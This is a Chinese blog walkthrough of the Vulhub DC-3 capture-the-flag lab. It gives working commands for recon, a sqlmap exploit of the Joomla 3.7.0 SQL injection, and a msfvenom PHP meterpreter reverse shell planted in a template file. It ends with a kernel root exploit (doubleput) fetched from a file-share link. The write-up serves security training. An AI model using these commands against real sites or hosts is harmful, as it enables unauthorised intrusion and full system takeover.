Vulhub-DC-3靶场

Vulhub-DC-3靶场

前言

今天把DC-3的靶场打了一遍,可以说这个靶场用到的思路是非常经典的,从信息搜集到漏洞利用包括内核提权。最最重要的是为了下载它的提权EXP,我它喵还花了一块二买了个CSDN站的代下载。DC-3靶场只有一个Flag,通过本篇博客,我们可以学到如下几点:

1.内网主机信息探测

2.JoomScan漏洞探测

3.MSF制作PHP马

4.python回显shell

5.Linux内核提权

正文

信息搜集

首先来一波传统艺能arp-scan,得到信息如下，发现存活主机10.0.2.6：

arp-scan -l

结合nmap获得如下信息

nmap -sV -Pn -A -p- -v 10.0.2.6

访问页面后发现是Joomla,所以直接上JoomScan,此工具使用方法较为简单，执行后出现如下信息:

Joomscan -u http://10.0.2.6:80/

SQL注入获取后台密码

因为得到他是Joomla3.7.0的CMS,并且爆出了后台路径和可执行路径。

并且通过查询exploit-db,Joomla3.7.0CMS存在SQL注入，漏洞利用方法如下

sqlmap -u "http://10.0.2.6:80/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

根据SQLMAP,查询到在数据库Joomladb下的#__users表下存在如下账户数据。

这个Password将它保存至文本中，然后使用Jhon去破解。

Jhon破解hash

Jhon的使用教程:

Jhon po.txt

得到密码snoopy，通过它我们访问之前扫描到的后台网页成功登录。

后台上传MSF木马

因为我们之前看到可访问的路径有components,templates等，在templates组件下发现可以直接修改编辑文件。

考虑直接上传MSFvenom生成的木马，继而反弹至msfconsole。过程如下:

MSF制作PHP木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R>test1.php

为了避免上传之类的麻烦,我直接将内容粘贴至component.php

MSF建立会话

#1.使用Handler模块
msf6 >use exploit/multi/handler
#2.设置payload
msf6> set payload php/meterpreter/reverse_tcp
#3.设置监听IP
msf6> set LHOST 10.0.2.15
#4.设置监听端口
msf6> set LPORT 4444
#开启监听
msf6> run

开启监听后,当我们访问http://10.0.2.6/templates/beez3/component.php,即可得到会话

系统提权

此时进入shell，发现看不到命令提示，使用python进入伪终端。

发现find可以使用，查看是否可以利用的SUID,结果并不理想。可能性比较大的ping也尝试失败。考虑内核提权，进行信息搜集

#查看系统内核
cat /pro/version
#查看分发信息

通过本地数据库进行查询，发现如下可利用的。

又因为gcc可以使用，便尝试使用43418.c,42275.c,均以失败告终。最终通过使用39772.txt中的漏洞利用方法成功。

具体内容可自行查看39772.txt,在此讲述操作流程，首先下载39772.zip至kali本地。

39772.zip:链接：https://pan.baidu.com/s/1UJam_nqqB770JiO5sco2lQ
提取码：92t7

然后通过msf upload 进行上传

meterpreter> upload 39772.zip

上传成功通过伪终端进行解压，并且进行执行，具体命令如下:

unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf*
./compile.sh
./doubleput

最终得到root权限，获取flag.